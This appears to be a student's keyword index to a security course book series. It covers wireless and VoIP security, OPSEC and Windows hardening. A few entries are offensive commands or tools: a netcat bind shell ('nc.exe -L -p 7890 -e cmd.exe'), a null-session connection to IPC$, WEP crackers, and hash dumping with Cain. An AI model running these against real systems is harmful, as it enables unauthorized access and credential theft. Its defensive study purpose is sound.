                                                          Range: 10m - 75m, Rate= [ 250 Kb/s @ 2.4 GHz, 40 Kb/s @ 915 MHz, 20 Kb/s @ 868 MHz], Freq= 868 MHz, 915 MHz, 2.4 GHz (DSSS), low power
ZigBee - specification                          4   159
                                                          consumption
                                                          ZigBee accommodates long battery life by limiting the amount of time the radio used is used, system remain inactive until receiving a command to
ZigBee - long battery life                      4   159
                                                          enable light.
ZigBee - security                               4   161   encryption based on AES-CCM (AES-Cipher block chaining-msg Authentication Code(CBC-MAC))
                                                          provide security over: MAC (layer2), Newtorks (layer3), Applications (layer7), however the Same Key is used over the three layers, selection of the
ZigBee - security                               4   161
                                                          key is done @ installation time by: manufacturer, installer, or end-user
rijndael cipher - AES @ ZigBee                  4   161   also provides integrity protection that prevents encrypted traffic from being altered during transmission
IEEE 802.11 wireless                            4   163   support Ad-hoc, Infrastrucuture networks, , 802.11a, 802.11b, 802.11g, 802.11n
IEEE 802.11 specification                       4   163
                                                          weakness in the key scheduling algorithm of RC4, Attacker could recover the shared secret from nothing more than the encrypted data collected
WEP - security issues                           4   165
                                                          from wireless network
WEP - tools attack                              4   166   WEP crack , Airsnort , dwepcrack ,wnet/reinj , wepwedgie
                                                          accommodates two replacement for WEP:( TKIP, CCMP), provide strong encryption, reply protection, integrity protection (using: TKIP or CCMP), but
IEEE 802.11i                                    4   167
                                                          doesn't provide Authentication
TKIP - Temporal Key Integrity Protocol          4   167   one of the 802.1i protocols that provide: encryption, reply protection, integrity protection, work on the same WEP H/W ship
CCMP - Counter-Mode/CBC-MAC Protocol            4   167   one of the 802.1i protocols that provide: encryption, reply protection, integrity protection, require H/W ship for implement
IEEE 802.11x                                    4   167   provide network authentication, by using: EAP
                                                          authentication protocol provides network authentication. EAP used vary according to the clients OS, the back-end authentication systems (Windows:
EAP- Extensible Authentication protocol         4   167
                                                          Active Directory, LDAP, RADIUS)
EAPOL - EAP over LAN                            4   168   EAP over lan(EAPOL), the supplicant uses EAPOL to communicate with the Authenticator
EAP over RADIUS                                 4   168   the Authenticator uses EAP-over-RADIUS to pass the supplicant request to the Authentication Server
IEEE 802.1x authentication - Deployment         4   168   need three components: 1-supplicant, 2-Authenticator, 3-Authentication Server
WPA - (Wi-Fi protect access)                    4   170   the wi-fi aliance adopted the AES-CCMP cipher mechanism designed for the new hardware
WPA2                                            4   170   results from the testing process for comliance with TKIP and AES-CCMP.
wireless - general misconception                4   172
wireless-I donot need to worry about security   4   172
wireless-We don't have any wireless             4   172
wireless - technical misconception              4   174
wireless - risk misconception                   4   176
wireless - eavesdropping                        4   179
wireless - eavesdropping mitigation             4   180
wireless - masquerading                         4   181
wireless - masqureading - captive web           4   181
wireless - masquerading mitigation              4   182
wireless - TTLS                                 4   182
wireless - PEAP                                 4   182
wireless - denial of service                    4   183
wireless - flaws in WiFi card firmware          4   184
wireless - denial of service(DoS) mitigation    4   185   prepare appropriate response strategy and IDS to react quickly to against attacker
wireless - Rogue AP                                4    186
wireless - Rogue AP mitigation                     4    187
wireless - secure WLAN planning                    4    189
wireless - network protecting                      4    190
VOIP overview                                      4    196

VOIP risk(Key Risks)                               4    197      internal risk, internal misuse, theft, system malfunction, service interrupting, service interruption, congif error, improper change management.

VoIP - External attacks                            4    197      DOS and external attacks
VoIP - Internal misuse                             4    197      sniffing voip traffic
VoIP - theft                                       4    197
VoIP - system malfunction                          4    198
VoIP - service interruption                        4    198      due to Network BW, QOS, Power failure
VoIP - configuration error                         4    198
VoIP - improper change management                  4    198
VOIP - LAN                                         4    199      LAN is more reliable and faster than WAN
VOIP - WAN                                         4    200      quality may vary significantly.
VOIP - Voip networking                             4    201      combine data voice, to extend voice over packet-switching, the motivator for implementing it is ROI
VoIP - packetized                                  4    201
VOIP - advantages 1                                4   202-203   cost savings, voice compression: T1 support max 24 circuit switches conv with compressing it we bettter utilize BW in packet
VOIP - advantages 2                                4   202-203   switched net, we can reduce BW from 64 kbps/call->6 kbps/call, new services"Click to Call", Location independence
VoIP - click-to-call                               4    203      click on URL of website to initiate call over VoIP network
VoIP - as a smart network                          4    203      provide possibility for new features & services
VOIP - disadantage =>quality assurance challenge   4    204
VOIP - delay types                                 4    205      1-accumulation delay (algorithm delay). 2- proceding delay . 3- network delay
VoIP - disadantage => jitter                       4    205
VoIP - disadantage => delay                        4    204      Echo , Talker overlap
VoIP - disadantage => lost-packet compensation     4    205
VoIP - disadantage => echo compensation            4    206
VOIP - source of delay                             4    205
VOIP disadvantage=>reliability&availability        4    207
VOIP - architecture=>                              4   208-209
VOIP - architecture=> PSTN PBX/VoIP intergration   4    208      PBX connected PSTN with VoIP.VoIP connect multible PBX together to provide connectivity to end-user with VoIP phone
VOIP - architecture=> IP PBX/PSTN intergration     4    208      all users utilize VoIP phone to connect to IP PBX and IP PBX connect with PSTN
VOIP - architecture=> pure VoIP networks           4    209      also known as "walled garden".VoIP network connect with another VoIP using hostname or IP for dialing instead of phone #
VOIP - architecture=> VoIP/PSTN ISP                4    209

VOIP - components                                  4   210-211   Media gateways, Registration and Location server, Proxy servers, Message Servers, End-user device, VoIP phoones, FXS, soft phone

VOIP - traffic patterns                            4    212      call setup stream & Voice stream, once the setup phase has completed, caller "Bob" creates direct connection to receiption Alice to avoid latency

VOIP - call operation                              4    212      call setup next next directed connection through proxy server
VOIP - protocols                                   4    214      Signaling (H.323, SIP), Media (RTP), Supporting (necessary protocols to support VOIP signaling and media "TCP, UDP, IP")
VOIP - Signaling - H323                            4    215      provide both Voice & Vedio, use UDP or TCP, standard by ITU and based on ASN.1 "Abstract Syntax Notation" standard
VOIP - Signaling - H323                            4    215      is a set of protocols include: H.225, H.245, H.235, H.239
VOIP - Signaling - ASN.1                           4    215      for specifying data that can be challenging to implement securely in a modular or "light weight" fashion
VOIP - SIP(Session initialization protocol)   4   216   similar to HTTP's GET and POST methods. Most implementation of SIP over UDP for performance.extensible
VOIP - SIP packet details                     4   217   All in ASCII strings, 1- Rquest Line (register , invite , ack, cancel, bye, options), 2-Msg header, 3- msg body (optional)
VOIP - CID "Caller ID"                        4   217   CID (caller id info), included in the Msg header
VOIP - SIP packet=>message header             4   217   information indicating the source and destination of call,and caller indentification information (CID )
VOIP - SIP packet=>meesage body               4   217   protocol negotiation details,encoding ,echanism (for compression),IP address info.
VOIP - SIP packet Exchange                    4   218   see diagram @ book
VOIP - RTP "real-time protocol "              4   220   used to transport packetized voice, end to end protcol, does not need to traverse gateway srvr, commonly UDP,
VOIP - real-time control protocol RTCP        4   220   reporting statistic about RTP session including jittermpacket loss ….and can control flow of information between two VoIP
VOIP - TCP vs UDP                             4   221   UDP is preferred for VoIP network because it has less overhead (smaller header size and no ack)
Skype                                         4   222   proprietary VOIP, clients relay traffic for each othes (P2P)
VOIP - operation challenge                    4   224

VOIP - Nat challenges                         4   224   the firewall pass SIP to setup call then recipient answers the call, the RTP attemp to contact internal ip but stateful FW drop unless it does inspection

VOIP - quality concern                        4   224
VOIP - E911 location reporting                4   224   couldn't determine the caller location for emergency purposes.
VOIP - wiretapping support                    4   225   eavesdropping
VoIP - provider taxation                      4   225   taxation due to losses caused to the telecom providers.
                                                        CID Spoofing, Phone impersonating (Limited Strong Auth. "weak PIN", SIP Digest dictionary attacks), DOS (SIP cancel), Implementation attacks
VOIP - security challenge                     4   226
                                                        (Vulnerabilities)
VoIP - CID spoofing and privacy attack        4   226
VoIP - impersonation                          4   226
VoIP - limited HID                            4   227
VoIP -SIP digest authentication attack        4   227   attacker sniff the passwd hash & brute force it offline.
VoIP - DoS vulnerability -SIP cancel          4   227   by sending SIP cancel.
VoIP - call Hijacking                         4   228   where attacker takes over the identity of legimate user.
RTP stream manipulation                       4   228   Man - in - the - middle attack
RTP Sniffing                                  4   228   with tools like: WireShark
RTP Replay attack                             4   228   Attacker will record a specific telephone conversation, then broadcast the content to large number of VOIP users.
                                                        1-Audit implementation to assess traffic pattern, 2-tunnel traffic with IPSEC, 3- use firewalls that understand SIP/H.323, 4-Monitor logging data, 5-
VOIP - securing best practice                 4   229
                                                        Isolate VOIP traffic on dedicated channel
                                                        OPSEC's focus on establishing a process for identifying the weak links often exploits by adversaries, one size not fit all. Adjust and develop fro your
OPSEC - management app. Operation security    4   236
                                                        specific need
OPSEC - The pentagon Pizza Delivery Story     4   236   we need to keep the details private
OPSEC - three law of defense                  4   237   1- Know the threat, 2- Know what to protect, 3- if u fail in the first two, the enemy wins.
OPSEC - weekly assessment cycle               4   238   Five steps [consideration]
OPSEC - 5 steps                               4   238
employee issuse - OPSEC                       4   239
screening & selection of employees - OPSEC    4   239   invetigate about ur emplyees before hiring them, look for their history, make sure that ur HR is doing his work
separation of duties - OPSEC                  4   240   try to look for ways to reallocate tasks across multiple positions.
rotation of duties                            4   240   regularly rotate positions to alleviate the collusion between the employees
termination agreement                         4   240   used to minimize the problems that a dismissed employee could make.
employment agreement                          4   241   Non-Competition, Non - Solicitation, Non Disclosure Agreement (NDA), Intellectual property
Non-Competition                               4   241   u cannot work for a competitor
Non-Solicitation                              4   241   if u leave, don't take anyone with u.
NDA - Non Disclosure Agreement                    4    241      u cannot disclose sensitive information outside the company.
intellectual property                             4    241      organisation owns what u develop while employes.
Need to know - OPSEC                              4    242      Access available only : when, what, where necessary, according to business requirements and with Least Privilage concept
least priviledge - OPSEC                          4    242      ensures that only the min required access rights are given at anytime.
OPSEC- putting it all together                    4    243
Nick Leeson and barring bank - OPSEC              4    243
OPSEC-sensitive information                       4    245      Mark sensitive information by level, must enforce Mandatory Security Policy.
Backup access - OPSEC                             4    245      having a backuo access, gives u the right to copy, erase or overwrite files, so dangerous in the hands of malicious user.

Backup plan (schedule) - OPSEC                    4   245,246   u need to have a backup plane, & Don't make sure that this plane is working good until u have fully tested it and try to make full recovery.

destructive plan - OPSEC                          4    246      should e implemented to avoid aggregation of information that is no longer useful or not in use.
offensive OPSEC                                   4    248
OPSEC- mail example                               4    248
OPSEC -Extract Knowledge                          4    250
OPSEC - protecting against OPSEC failure          4    253
                                                                1- Identify your target, 2- Collect open source or other info, 3- estimate (capacity, upcomming products, business vulnerability, approach to
offensive OPSEC process                           4    254
                                                                marketing, …..)
competitive intelligence                          4    254      collecting open source information on a corporation
competitive intelligence ethics                   4    255
Open Source Collection - OPSEC                    4    257
OPSEC - corporate information                     4    257      Change in ownership , Owner stock purchase or sale ,Employee stock option plans
EDGAR DB                                          4    257      at the Securities and Exchange Commission, u'll find annual and quarter reports goldmines of information.
fdcenter.org                                      4    257      for Private foundations
Edgar search                                      4    259      will provide documents related to the company
Whois DB                                          4    260      gives u contact info [names, address, emails, phones], dns server information
robots.txt                                        4    261      u can see unlinked gages to not to search in it.
Wayback                                           4    262      www.archive.org, this website takes snapshots of your website few times a year.
                                                                www.fundrace.org, Google.com (Business partners pages, phone listing, soft and hardware used), www.monster.com, www.gao.gov (US General
open source collective-info from other web site   4    265
                                                                Accounting Office)
monster.com                                       4    265      is an employment website, search for jobs than guess the company infrastructure
open source collective -company financials        4    266
open source collective- product info              4    267      the big three credit reporting agencies
open source collective- individual info           4    268      www.intelius.com
open source collective- about me                  4    269
Keyword                                      Book       Page
windows os                                          5           5
Windows xp home edition                             5           6
Windows xp sp2 features                             5           7
DEP                                                 5           7
Data excution preventation                          5           7
RPC/Dcom                                            5           7
raw tcp sockets                                     5           7
Windows xp sp3 features                             5           8
Internet explorer                                   5           8
windowes server 2003                                5           9
windowes server 2003 web                            5           9
windowes server 2003                                5           9
windowes server 2003 R2                             5          10
DFS (Distributed file system)                       5          10
ADFS                                                5          10
ADAM                                                5          10
Active Directory Application Mode                   5          10
windowes vista                                      5          11
bitlocker drive encryption                          5          11
UAC (User Account Control)                          5          11
internet explorer 8                                 5          12
smart card EFS                                      5          12
Firewall fo windows with advanced security          5          12
win firewall with advanced security                 5          12
Application locker(App Locker)                      5          12
Direct access                                       5          12
windowes server 2008                                5          14
windowes server 2008 features                       5          14
modularization in server 2008                       5          14
Server Core                                         5          14
IIS 7                                               5          15
RODC (Read Only Domain Controller)                  5          15
NAP (Network acces protection)           5   15
SSTP (Secure Socket Tunnling Protocol)   5   15
Routing and Remote Access Service        5   15
RRAS                                     5   15
Remote Desktop Services Application      5   15
RDP (Remote Desktop Protocol)            5   15
power Shell                              5   15
Hyper-V (HyperVisor)                     5   15
windowes server 2008 R2                  5   16
branchCache                              5   16
windowes mobile                          5   17
SDHC slot                                5   17
ActiveSync                               5   17
System center mobile device mana         5   17
windowes mobile hardening                5   17
anti-malware scanner                     5   18
data encryption and access control       5   18
windowes mobile best practises           5   19
workgroup                                5   21
workgroup characteristics                5   21
workgroup benefits                       5   23
workgroup disadvantages                  5   24
local accounts-Management                5   25
SID (security ID)                        5   26
SID security id well known               5   26
SAT (Security Access Token)              5   28
whoami /all/fo list                      5   28
active directory domain                  5   32
domain controllers                       5   32
access control list ACL                  5   32
Multi-Master replication / AD            5   32
PDC                                      5   32
BDC                                      5   32
time stamp and update sequence              5   32
Registry vs. Active directory                   33
Global vs. local users and groups               33
RODC credentials                            5   33
active directory store                      5   32
active directory size                       5   33
SAT (Security Access Token)                 5   35




kerberos                                    5   36
kerberos process                            5   36

kerberos used protocols                     5   36

kerberos cracker                            5   37


NTLM

                                            5   38
Forest & trust                              5   39
Forest & trust _ Inter-domain replication       39
global catalog server                       5   39




global catalog CG                           5   39
schema                                      5   39
configuration naming context                5   39
Forest & trust - two way transitive trust
trust nature                                5   41
cross forest turst                    5 42,43
transitive trust                      5         42
trust direction                       5         42
group policy                          5         44




GPO Group Policy Objects              5         45
group policy management console       5         46


Service Pack                          5         52


Service Pack Problem discovery        5         52
service pack staged deployment        5         53
slipstreaming                         5         54
automate sp install (Hands free SP)   5         55
automate sp with group policy         5         56
schtasks.exe                          5         55
exec.vbs                              5         55
psexec.exe                            5         55
service pack batch installition       5         55
net.exe use                           5         55
update.msi                            5         56
hotfix                                   5         57
roll-up                                            57
cumulative hotfixes                      5         57

hotfix newsfeed                          5         58

microsoft update                         5         59


automatic update                         5         60
update iso file                          5         60
WSUS (windows server update services)    5         61
software update service SUS              5         61
windows update service WUS               5         61
wsus work                                5         63
BITS (background intelligent transfer)   5         63
wsus administration                      5         64
wuau.adm template                        5         64
patch management 3rd party               5         66
HFNETCHK.EXE tool
backup win xp/2003                       5         69
ntbackup.exe                             5 69,71
ASR (Automated System Recovery)          5         69
VERITAS of backup Exec fame                        69

system state                             5         71
windows 7/2008/vista backup              5         72
ntbackuprestore.exe                      5         72
backup win7,2008,vista                   5         72
backup vista home basic,perimum          5         72
robocopy.exe                             5         73
robocopy.exe                          5   73
robocopy.exe command                  5   73
wbadmin.exe                           5   73

WSB (windows server backup)           5   73
volume shadow copy system             5   73
backup 3 party                        5   74
binary disc image                     5   75
dd for windows                        5   75
symantic ghost                        5   75
system restore snapshot               5   76
restore point                         5   76
system restore automaticaly           5   76
system restore win xp                 5   77
system restore win 7/vista.           5   77
pervious version tab in vista/later   5   77
Restore Point from calender           5   78
previous version how?steps            5   79
backup & restore center integration   5   80
driver rollback                       5   81

SAT (Selective Access Control)        5   86
cdfs                                  5   88
fat and fat32                         5   88

NPFS (Named Pipes File System)        5   88
NTFS nt file system                   5   88
NTFS characteristics                  5   88
NTFS-unsed exception                  5   88

transaction oriented processing       5   89
NTFS compression                      5   89
BSOD blue screen of death                         5          89
CHKDSK.exe                                        5          89
NTFS DACL                                         5          90
DACL list of permissions on file or folder NTFS   5          90
ACE (Access control entries)                      5          90
XCACLS.exe                                        5          90
ICACLS.exe                                        5          90
NTFS-ACE                                          5          90
NTFS special permission box                       5          90
Standard or Genric permission -NTFS               5          90
Advanced security setting deny override allow
NTFS standard permission                          5          91
NTFS inherited permissions                        5          91
NTFS explicit permissions                         5          91
NTFS permission inheritance                       5 90,91
NTFS scope of inheritance                         5          92
NTFS Compliexity is security vulnerablity         5          92
Permission Schema                                 5          92
creator owner group                               5          93
power users group                                 5          96
NTFS least privilege                              5          95
Prinsiple of least privilage                      5          95
Power Users group                                 5          96

global group                                      5          97

universal group                                   5          97
Agulp                                             5          97
active directory groups                           5          99
a distribution group in AD                        5         100
universal group (security)                        5         100
SMB (server message block)                        5         101
CIFS (common internet file system)                5         101
shared folder access                    5   101
share permissions                       5   101
share permissions                       5   102
net.exe share                           5   102
share permissions xp                    5   103
share permissions 2003 /later           5   103
share permissions                       5   103
administritive shares                   5   105
administritive shares                   5   105
administritive shares removing          5   105
administritive shares IPC               5   105
IPC$                                    5   105
UNC (Universal Naming Convential )      5   104
registry                                5   108
REG.exe                                 5   108
REGedit.exe                             5   108
Registry keys                           5   108
Registry values                         5   108
REGSVC.exe                              5   109
Remote registry service                 5   109
Registry key permissions                5   109

Registry "winreg"                       5   109
Registry "allowedpaths"                 5   110
SACL (System Access Control List )      5   111
registry permissions                    5   111
Active Direcotry Permissions            5   112
organizational unit                     5   114
Active Directory Delegation Authority   5   114
Delegation authority -AD                5   114

MIC (Mandatory Integrity Control)       5   116
MIC (Mandatory Integrity Control )      5   116
WIC                                           5   116
SAT (Security Access Token )                  5   116
ICACLS.exe                                    5   117
whoami.exe                                    5   117
accesschk.exe                                 5   117
CHML.exe                                      5   117


MIC (Mandatory Integrity Control (Label))     5   117
MIC (Mandatory Integrity Control (Rule))      5   117
MIC (Mandatory Integrity Control (Read))      5   117
MIC dosen't restrict Read/Eecute              5   117
MIC prior to ADCL                             5   117
whoami /priv                                  5   118

user rights                                   5   118
user rights-managed by GPO                    5   118
ntrights.exe                                  5   119
user rights allow/deny user o group           5   122
take ownership right                          5   123
backup/restore files and directories right    5   124
user rights backup/restore                    5   124
DLL Injection Attack                          5   125
debug programes-used in DLL injection &cain   5   125
Cain dump password hashes and LSA             5   125
cipher.exe                                    5   126
OllyDbg                                       5   125


EFS (Encryption File System )                 5   126
webdav ,SMB                                   5   126
EFS (Encryption file system) (version)        5   128
EFS recovery certficate                       5   129
cipher.exe /R :<filepath>              5   129
cipher.exe /R :<filepath>/smartcard    5   129
encryption file system win2000         5   130
encryption file system best practise   5   131
syskey.exe                             5   131
Paging files                           5   131
EFS best practice-SYS.EXE tool         5   131
syskey.exe                             5   132
cipher.exe /w                          5   132
PAGEFIL.SYS                            5   132
HIBERFIL.SYS                           5   132
bitlocker benefits                     5   133
bitlocker availability                 5   133
bit locker-encryprion                  5   133
bitlocker boot volume                  5   133
bitlocker prequisite                   5   133
bit locker-requiremnts                 5   134
bitlocker system volume                5   134
bit locker-integrity check details     5   134
FVEK (Full Volume Encryption Key )     5   134
bitlocker steps how it works?          5   134
TPM turn on                            5   134
TPM (Trusted Platform Module)          5   135
trusted platform module intializatio   5   135
TPM.msc                                5   135
TPM Management                         5   135
bitlocker tpm options                  5   136
Bit Locker Transparent 100% to users   5   136
WMI                                    5   137
cold boot attack                       5   137
bitlocker turnoff                      5   138
bitlocker disabling                    5   138
bitlocker recovery                     5   139
tpm owner password                           5   139
Emeregncy recovery - Bit Locker              5   140

bitlocker recovery password                  5   140
bitlocker recovery/backup active directory   5   140
security template                            5   145

security template store                      5   145
.INF security template                       5   145
security template files                      5   146
%systemroot%\security\Templates\             5   146
Edit security template                       5   146
MMC.exe                                      5   146
Genric.inf new security tamplates            5   146

Microsoft, NIST, DISA, NSA                   5   146
security template enterprise client          5   147
specialized security limited function        5   147
SSLF                                         5   147
FDCC                                         5   148
CIS (Center For Internet Security )          5   148
FISMA                                        5   148
CIS scoring tool                             5   148


sca snap in                                  5   150
security configuration and analysis          5   150
SCA datbase                                  5   150
Secedit.exe                                  5   152
secedit.exe /configure/db a:\db.dbs          5   152
GPO local (Group Policy Object )             5   153
local GPO (Group Policy Object )             5   153
computer configuration / GPO                 5   153
user configrations /GPO                   5      153
local group policy object (GPO)           5      155
WSH (Windows Script Host)                 5      156
GPO scripts ( Startup/Shutdown scripts)   5      156
administritve templates                   5      157
administritve templates                   5      157
microsoft office kit                      5      157
ADM/ADMX templates                        5      157


domain group policy object                5      158
Organizational unit GPO                   5      159
default domain policy GPO                 5      159

GPMC Group policy management console      5      160
default domain policy GPO                 5      160
GPO settings checklist                    5      161

GPO password policy                       5       162
min password policy                       5       163
account lockout policy                    5       164
GPO security options recommend            5       165
GPO administrtive templates               5       166
annonymous access                         5       169
null user session                         5       169
dumpusers.exe                             5   169,170
null session command                      5       169
net.exe use\\target\IPC$ "" /user""       5       169

null session disabling                    5      170

Anonymous Restrict                        5      170
Anonymous permissions/annon. Logon grp    5      170
anonymous connection Aditional restrection for   5      170
anonymous access disabling                       5      170
anonymous asscess                                5      170

kerberos&NTLM2                                   5      172
Kerberos tickets                                 5      171
rainbowCrack                                     5      171
Lan Manager Authentication Level GPO             5      172
NTLMv2 enabling                                  5      172
NTlm v1 lan manager disabling                    5      172
NTLM V2                                          5      172
guest account disabling                          5      173
net user guest $5&uuu /active:no /times
autmomatic demotion to guest"file share"         5      174

Simple file sharing network access               5      174
Classic-local uesrs authinticate as themselves   5      174




administritve accounts                           5      175
administritve accounts locking                   5      175

runas.exe                                        5      176
decoy account                                    5      176

SRP (Software Restriction Policies )             5      177
SRP exceptions                                   5      177


SRP (Software Restriction Policies )             5   177,178
CRL (Certificate Revocation List)                5       178
SRP global options                               5       178
SRP enforcement option             5   178
SRP designated file types          5   178
SRP trusted publishers options     5   178

Application Locker(App Locker)     5   178




user account control               5   179
DROPMYRIGHTS.EXE                   5   179
whoami.exe                         5   179
internet explorer security         5   181
internet explorer protected mode   5   181
internet explorer protected mode   5   182

ieuser.exe                         5   182

ieinstall.exe                      5   182
broker proces                      5   182

internet explorer                  5   183
internet explorer hardneing        5   184
smartScreen filter                 5   187
Trusted Sites Zone                 5   186
Restricted Sites Zone              5   186
xss filter                         5   187
inPrivate filter                   5   187
Phishing Filter                    5   187
Phishy Pheatures                   5   187
thwart XXS attack                  5   187
Cross Site Scripting               5   187
bad sites                          5   187
Report Unsafe                                    5   187
secure host                                      5   190
service disabling                                5   193
SECEDIT.exe or SCA                               5   193
INF Security                                     5   193
Security and Configuration and Analysis          5   193
services startup settings                        5   193
sc.exe                                           5   194
sc.exe \\pc query                                5   194
sc.exe getkeyname Service_name                   5   194
sc.exe \\pc queryex service_regKey               5   194
sc.exe \\pc qc service_regkey                    5   194
sc.exe \\pc service_regKey stop                  5   194
sc.exe \\pc service_regKey start=disa            5   194
service dependencies                             5   194
dependencies service                             5   194
SC.EXE better than NET.EXE                       5   194
system services section of GPO                   5   194
SCW (Security Configuration Wizard )"scw.exe."   5   196
SCW (Security Configuration Wizard )             5   196
roles in SCW                                     5   196
rollback                                         5   196
scw xml policy file                              5   197
XML report - SCW                                 5   197
scwcmd.exe                                       5   197
scwcmd.exe configure /p:file.xml                 5   197
security configuration wizard functi             5   197
scwcmd.exe view /x:report.xml                    5   198
scwcmd.exe analyze /?                            5   198
scwcmd.exe configure /?                          5   198
scwcmd.exe transofrm /p:policyfile g             5   198
server manager                                   5   199
roles in server manager                          5   199
features in server manager                 5   199
roles & features add/remove                5   200
servermanagercmd.exe                       5   200
server core option /installation           5   200
binding                                    5   201
network adapter binding                    5   201
nbstat -A ipaddress                        5   203
netBios name                               5   203
netBios code number                        5   203
code number inside chevrons                5   203
netBios                                    5   205
netBios disabling                          5   205
sc.exe qc netbt                            5   206
sc.exe config netbt start=disabled         5   206
sc.exe config netbt start=system           5   206
netbios - null user sessions               5   206
lightweight directory access protocol      5   208
LDAP                                       5   208
kerberos port numbers                      5   208
netbios name service                       5   209
netbios datagram service                   5   209
netbios session service                    5   209
wfas                                       5   211
windows firewall with advanced             5   211
wfas                                       5   212
network location types                     5   213
network location types private             5   213
network location types public              5   213

network profile                            5   213

domain network in network location types   5   213
network location types domain              5   214
WFAS log pfirewall.log                     5   214
WFAS block all connections                 5   214
WFAS rules "firewall rules"                5   215
secure connection                          5   216
require encryption                         5   215
nc.exe -L -p 7890 -e cmd.exe               5   216
firewall "wfas"keeping blocking /unblock   5   217
wfas rule processing                       5   217
netsh.exe                                  5   218
netsh.exe advfirewall show allprofi        5   218
netsh.exe advfirewall firewall show        5   218
netsh.exe advfirewall firewall set         5   218
Ipsec                                      5   220
ipsecpol.exe                               5   221
ipseccmd.exe                               5   221
netsh.exe ipsec dynamic                    5   221


ipsec commands                             5   221
ipsec request                              5   223
ipsec & Group policy                       5   223
ipsec client respond only                  5   224
ipsec require in Organization Unit         5   225
ipsec secure server require security       5   225
ipsec server request security              5   225
SSTP (secure socket tunnling protocol)     5   226
L2tp (layer two tunnling protocol)         5   226
ipsec+l2tp vpn                             5   226
point to point tunnling protocol PPTP      5   226
PPTPv1                                     5   227
pptpv2                                     5   227
vpn client software                        5   228
vpn interface                              5   228
ipconfig.exe                               5      228
vpn require pptpv2                         5      229
MS-CHAPv2 option with PPTPv2               5      229
EAP (Extensible Authentication Protocol)   5      229
Routing and Remote Access service          5      230
NLB (Network load balance)                 5      230

RRAS                                       5      230
inernet security & accelration server      5      230
IIS (Information Internet Server)          5      233
IIS ( Information Internet Server )        5      233
Sever Core                                 5      234
Stande-alone IIS box                       5      234
IIS is member server /domain member        5      234
IIS Patched Install                        5      234
sever2008 r2                               5      234
.net frame work                            5      234

IIS server manager                         5      235
SERVERMANAGERCMD.EXE tool                  5      235
servermanagercmd.exe -query                5      235
IIS NTFS permissions                       5      236


IIS NTFS permissions                       5      236
IIS IUSR_computername                      5      237
IIS host header                            5      238

IIS host header                            5      238


Code Red Worm                              5   239,241
IIS handler                                5       240
iis handler native code                 5   240
iis handler managed code                5   240
iis staticFile handler                  5   240
iis directory handler                   5   240
inetinfo.exe                            5   240
internet printing buffer over flow      5   241
htr buffer over flow                    5   241
active server page exploit              5   241
iis folders not to have                 5   242
iis msadc folder                        5   242
old rain forest puppy rds exploit       5   242
iis exchange folder                     5   242
OWA Worm                                5   242
IIS access controls                     5   243
IIS Basic Authentication                5   244
IIS urlscan.dll                         5   245
urlscan.dll                             5   245
IIS7 requestFilteringModule             5   245
IIS logging                             5   246
IIS enable loging                       5   246
IIS security loging                     5   246
wget.exr                                5   247
webdav                                  5   247
logging interval                        5   247
search-textlog.ps1                      5   248
sql server security tips                5   249
integrated windows authentication       5   249
RDS ( Remote Desktop Services )         5   252
RDS (Remote Desktop Services) license   5   253
remote desktop                          5   253
Terminal services                       5   253
remote desktop services web acces       5   255
remote assistance                       5   255
RDP(Remote Desktop Protocol )          5   256
tcp port 3389                          5   256
RDP encryption levels server2003       5   256
RDP Encryption levels fips compliant   5   256
NLA (Network Level Authentication)     5   257
RDP 6 client                           5   256
RDP 7 client                           5   258
RDP best practices                     5   259
RDP citrix                             5   260
Microsoft Security Assesment Tool      5   261
MSAT                                   5   261
mbsacli.exe                            5   262
auditing                               5   266
automation                             5   266
support tools                          5   269
support tools list                     5   269
remote server administration tools     5   270
RSAT                                   5   270
microsoft resource kits                5   271
list of resource kits                  5   272
list of resource kits 2                5   275
wmic.exe                               5   277
wmic.exe /node:ip get servicepack      5   281
snapshot.bat script                    5   310
network configuration tools            5   282
netdiag.exe                            5   282
netdiag.exe /v                         5   282
netdiag /test:testName /v              5   282
netsh.exe                              5   282
netsh.exe set machine IpAddress        5   283
getmac.exe                             5   283
net.exe                                5   283
netstat.exe                            5   283
ipconfig.exe                     5   283
route.exe                        5   283
nbtstat.exe                      5   283
sysinternals tools               5   284
foundstone                       5   284
somarsoft                        5   284
joeware                          5   284
process explorer                 5   284
autoRuns                         5   284
psExec                           5   284
rootkitrevealer                  5   284
psinfo                           5   284
forensic toolkit                 5   284
forensic toolkit                 5   284
ntlast                           5   284
fport                            5   284
scanline                         5   284
dumpEvt                          5   284
dumpReg                          5   284
Dumpsec                          5   284
joeware                          5   284
windows server resource kit      5   286
windows management instrument    5   286
wmi                              5   286
windows scipts                   5   286
technet script center            5   289
set in cmd.exe                   5   289
powershell                       5   290
powershell                       5   290
exchange server 2007             5   290
cmdlet                           5   290
power shell commands             5   291
FRS (File Replication Service)   5   292
scripts using GPO                      5   292
wscript.exe \\server\script.vbs        5   295
scheduling jobs                        5   294
SCHTASKS.exe                           5   294
CCB (Change Control Board)             5   297
CCB (Change Control Board)             5   297
audit policy compliance                5   297
SCA snap in                            5   298
secedit.exe                            5   299
Microsoft Baseline Security Analayze   5   300
MBSA features                          5   300
SQL Security using MBSA                5   303
mbsacli.exe                            5   304
mbsacli.exe /r "ip-range" /f "file"    5   304
mbsacli.exe /l"ell"                    5   305
mbsacli.exe /Id "report name"          5   305
system snapshot                        5   306
system snapshot name                   5   307
system sanpshot format                 5   307
snapshot content                       5   308
metabase                               5   309
snapshot.bat script                    5   310
sha256deep.exe                         5   310
net.exe accounts                       5   311
auditpol.exe /get/category:*           5   311
netsh.exe winsock show catalog         5   312
netsh.exe firewall show config         5   312
wmic.exe sysdriver list full           5   313
autorunsc.exe                          5   313
diruse.exe /s                          5   313
fc.exe /                               5   315
windiff.exe                            5   315
csdiff.exe                             5   315
list.exe                               5   315
highlighter                            5   316
windows event logs                     5   317
windows event logs appliation logs     5   318
logevent.exe                           5   318
system log                             5   318
event log                              5   318
LOGEVEnt.exe                               318
audit policies                         5   319
audit account logon events             5   319
audit account management               5   319
audit directory service access         5   319
audit logon events                     5   319
audit object access                    5   319
audit policy change                    5   319
audit privilage use                    5   320
audit process tracking                 5   320
audit system events                    5   320
auditpol.exe                           5   320
auditpol.exe /get/category:*           5   320
audit object access policy             5   321
SACL (System Access Control List)      5   321
audit access to registry key           5   322
Audit best practices/should be audit   5   324
diruse.exe                             5   325
log size in xp /2003                   5   326
log size in vista/7                    5   326
logs wrapping options                  5   327
wrapping options                       5   327
psloglist.exe                          5   328
dumpevt.exe                            5   328
syslog                                 5   329
log consolidation                      5   328
dumpeventlog.vbs                    5   329
Microsoft System Center Operation   5   329
mom server                          5   329
Notes                                                                                       Column1
